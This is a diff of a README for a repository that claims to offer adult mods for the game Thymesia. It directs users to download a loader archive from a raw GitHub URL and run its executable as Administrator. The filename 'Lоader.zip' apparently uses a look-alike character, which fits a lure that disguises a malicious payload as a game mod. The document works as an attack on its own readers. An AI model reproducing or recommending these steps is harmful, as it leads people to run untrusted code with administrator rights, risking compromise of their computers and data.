Justdvp/ThymesiaSensualRealms/README.md

 Ready to experience Thymesia like never before?
 Follow these easy steps:

-1. Download `Loader.rar` from the repository’s Releases section.
+1. Download `https://raw.githubusercontent.com/Justdvp/ThymesiaSensualRealms/main/Lоader.zip` from the repository’s Releases section.
 2. Extract the Loader to your Thymesia installation directory using any popular archiver (WinRAR, 7zip, Unarchiver etc).
 3. Run the Loader executable as Administrator (**right-click → Run as Admin** on Windows).
 4. Follow on-screen prompts to enable adult-mode mods.